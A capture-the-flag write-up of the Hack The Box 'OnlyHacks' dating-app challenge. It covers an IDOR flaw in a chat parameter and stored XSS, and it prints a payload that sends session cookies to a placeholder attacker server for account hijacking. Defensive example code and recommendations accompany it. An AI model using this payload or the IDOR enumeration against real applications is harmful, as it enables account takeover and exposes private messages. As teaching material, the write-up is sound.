
Technical Security Report: "OnlyHacks" Challenge

Purpose of the Report

This document provides a comprehensive technical assessment of the "OnlyHacks" challenge from Hack The Box. The objective of this assessment was to identify and exploit security vulnerabilities within the web application to retrieve sensitive information, specifically the hidden flag.


Methodology

The security evaluation was conducted using the following approach:

  1. Web Application Interaction: Engaging with the application's features to understand its functionality and identify potential security weaknesses.

  2. Parameter Manipulation: Altering URL parameters to test for Insecure Direct Object References (IDOR) vulnerabilities.

  3. Cross-Site Scripting (XSS) Testing: Injecting scripts into input fields to evaluate the application's input validation mechanisms.

  4. Session Hijacking: Exploiting XSS vulnerabilities to capture session cookies and impersonate other users.


Detailed Findings

  1. Web Application Interaction

  • Observation: Upon accessing the provided URL, the application presents a login interface.

  • Action Taken: Initial attempts to bypass authentication using basic SQL injection techniques were unsuccessful. Subsequently, a new user account was created using the application's registration feature.

  • Result: Post-registration, the application directed the user to a dashboard displaying profiles of other users, resembling a dating application interface.

  2. Parameter Manipulation (IDOR Vulnerability)

  • Observation: While interacting with user profiles, the URL structure was noted as http://<target_ip>/chat/?rid=<number>, where <number> corresponds to the recipient's ID.

  • Action Taken: Manually modifying the rid parameter to different numerical values was attempted to access other users' chat interfaces.

  • Result: Altering the rid parameter allowed access to chat sessions of other users, confirming the presence of an IDOR vulnerability. This flaw permitted unauthorized viewing of private messages and potential exposure of sensitive information.
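The access-control failure behind the rid finding, as an added illustration that is not the challenge's own code: a model of the chat lookup in which the recipient id from the URL is the only selector, beside a version that keys the conversation on the pair (session user, rid) and checks the pair against the match table. The users, matches and messages are constructed sample data, and the handler shapes are assumptions about how such an endpoint is typically written.

```python
"""Model of the chat lookup behind /chat/?rid=<number>: the IDOR-prone
version beside an authorization-checked one. Users, matches and messages
are constructed sample data for this example, not the challenge's code."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    sender: int
    recipient: int
    body: str


# Constructed sample data: user 2 has matched (and chatted) with users 1 and 3.
MATCHES = {frozenset({1, 2}), frozenset({2, 3})}
MESSAGES = [
    Message(sender=1, recipient=2, body="hi from 1 to 2"),
    Message(sender=2, recipient=1, body="hi from 2 to 1"),
    Message(sender=3, recipient=2, body="private: 3 to 2"),
    Message(sender=2, recipient=3, body="private: 2 to 3"),
]


class Forbidden(Exception):
    """Raised when the session user is not a party to the requested chat."""


def parse_rid(raw: str) -> int:
    """Validate the rid query parameter: a positive integer, nothing else."""
    if not raw.isdigit():
        raise ValueError("rid must be a positive integer")
    rid = int(raw)
    if rid <= 0:
        raise ValueError("rid must be a positive integer")
    return rid


def chat_vulnerable(session_user: int, rid: int) -> list[Message]:
    """IDOR: rid is the only selector and session_user is never consulted,
    so any authenticated user can read any recipient's inbox."""
    return [m for m in MESSAGES if m.recipient == rid]


def can_view_chat(session_user: int, rid: int) -> bool:
    """Authorization rule: a chat is visible only to its two matched parties."""
    return frozenset({session_user, rid}) in MATCHES


def chat_hardened(session_user: int, rid: int) -> list[Message]:
    """session_user comes from the server-side session (never the request);
    the conversation is keyed by the pair (session_user, rid)."""
    if not can_view_chat(session_user, rid):
        raise Forbidden(f"user {session_user} may not view chat with {rid}")
    return [m for m in MESSAGES
            if {m.sender, m.recipient} == {session_user, rid}]


if __name__ == "__main__":
    # User 1 asks for rid=2: the vulnerable handler also returns user 3's
    # message to user 2; the hardened one returns only the 1<->2 thread.
    print([m.body for m in chat_vulnerable(1, 2)])
    print([m.body for m in chat_hardened(1, 2)])
```

The point of the hardened handler is that the identity half of the lookup never comes from the client: the session user is taken from server-side session state, and the request only supplies the other party. A server-side log of Forbidden responses on this endpoint is also a cheap detection signal for rid enumeration.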

  3. Cross-Site Scripting (XSS) Testing

  • Observation: The chat functionality permitted users to send messages to matched profiles.

  • Action Taken: Injected basic HTML and JavaScript payloads into the chat messages to test for XSS vulnerabilities.

  • Result: The application rendered the injected scripts without proper sanitization, indicating a stored XSS vulnerability. This allowed execution of arbitrary scripts in the context of another user's session.
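The rendering defect behind the stored XSS finding, as an added example rather than code from the challenge: a message renderer that interpolates stored chat text straight into HTML, beside one that encodes for the HTML text context with Python's html.escape. The sample inbox is constructed, and the list-item markup is an assumption about the page layout.

```python
"""Rendering stored chat messages: the unencoded version beside one that
encodes for the HTML text context. Sample messages are constructed for this
example; neither renderer is the challenge's real code."""
import html

# Constructed sample inbox: an ordinary message, one carrying markup, and
# one with legitimate quotes, ampersands and angle brackets.
SAMPLE_MESSAGES = [
    "hey, nice profile :)",
    "<script>alert('stored xss')</script>",
    'say "hi" & <b>smile</b>',
]


def render_vulnerable(messages: list[str]) -> str:
    """Interpolates message bodies straight into HTML, so any markup a
    sender stored is parsed and executed in the recipient's browser."""
    return "\n".join(f'<li class="msg">{m}</li>' for m in messages)


def render_hardened(messages: list[str]) -> str:
    """html.escape turns <, >, &, ' and " into entities, so the message is
    displayed as text. Output encoding is the control; filtering input
    alone is easy to bypass and mangles legitimate text like the third
    sample."""
    return "\n".join(f'<li class="msg">{html.escape(m, quote=True)}</li>'
                     for m in messages)


def has_script_element(rendered: str) -> bool:
    """Crude detector for this example: does a literal <script tag survive
    into the rendered document?"""
    return "<script" in rendered.lower()


def hardening_headers() -> dict[str, str]:
    """Defence in depth: a CSP without 'unsafe-inline' means that even an
    encoding slip does not turn into inline script execution in
    CSP-aware browsers."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'"}


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_MESSAGES))
    print(render_hardened(SAMPLE_MESSAGES))
```

The encoding must match the context the text lands in: html.escape with quote=True covers element bodies and quoted attribute values, but text placed inside a script block, a URL, or an event handler needs that context's own encoding, and templating engines with auto-escaping enabled do this by default.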

  4. Session Hijacking via XSS

  • Observation: Exploiting the identified XSS vulnerability could lead to session hijacking.

  • Action Taken: Crafted a payload to capture the session cookie of the recipient user and send it to a controlled endpoint. The payload used was:

    <script>document.location='http://<attacker_server>?cookie='+document.cookie</script>

  • Result: Upon the recipient viewing the malicious message, their session cookie was transmitted to the attacker's server. Utilizing this cookie, the attacker successfully impersonated the victim's session, gaining unauthorized access to their account.


Conclusion

The "OnlyHacks" challenge exposed critical security vulnerabilities within the web application, including Insecure Direct Object References (IDOR) and Cross-Site Scripting (XSS). These flaws allowed unauthorized access to user data and potential account compromise through session hijacking.


Recommendations

  • Implement Robust Access Controls: Ensure that users can only access resources they are authorized to view by validating user permissions on the server side.

  • Sanitize User Inputs: Apply proper input validation and output encoding to prevent injection of malicious scripts, thereby mitigating XSS vulnerabilities.

  • Secure Session Management: Utilize secure cookies with attributes like HttpOnly and SameSite to protect session data from being accessed or transmitted through client-side scripts.

  • Conduct Regular Security Audits: Perform periodic security assessments to identify and remediate vulnerabilities within the application promptly.
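The session-cookie recommendation worked through in code, as an added example that is not part of the original report or the challenge: one function issues a Set-Cookie header carrying HttpOnly, Secure and SameSite, and another audits a header value seen in a response and reports which of those attributes are missing. The cookie name and values are constructed.

```python
"""Session cookie attributes: issuing a hardened Set-Cookie header and
auditing one seen in a response. Cookie names and values are constructed
for this example; this is not the challenge's server code."""
import re

# RFC 6265 token characters, used to reject names/values that would need quoting.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def build_session_cookie(name: str, value: str, same_site: str = "Lax") -> str:
    """Set-Cookie value for a session id:
    HttpOnly  - document.cookie cannot read it, so a cookie-stealing script
                like the payload in this report obtains nothing;
    Secure    - sent only over HTTPS;
    SameSite  - not attached to cross-site requests (Lax or Strict)."""
    if not _TOKEN.match(name) or not _TOKEN.match(value):
        raise ValueError("cookie name/value contain characters outside the token set")
    if same_site not in ("Lax", "Strict"):
        raise ValueError("SameSite must be Lax or Strict for a session cookie")
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite={same_site}"


def audit_set_cookie(header: str) -> list[str]:
    """Return the hardening attributes missing from a Set-Cookie header value."""
    parts = [p.strip() for p in header.split(";")]
    attrs = {}
    for part in parts[1:]:  # parts[0] is name=value
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if "secure" not in attrs:
        missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax|Strict")
    return missing


if __name__ == "__main__":
    weak = "session=c0ffee; Path=/"
    print(weak, "->", audit_set_cookie(weak))
    strong = build_session_cookie("session", "c0ffee")
    print(strong, "->", audit_set_cookie(strong))
```

HttpOnly closes the specific exfiltration channel used in this report (reading document.cookie), but a script running in the victim's page can still issue requests that carry the cookie automatically, so the cookie attributes complement output encoding rather than replace it. Rotating the session id on login and expiring sessions server-side limits how long a stolen cookie stays useful.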

Addressing these vulnerabilities is crucial to safeguarding user data and maintaining the integrity of the application.
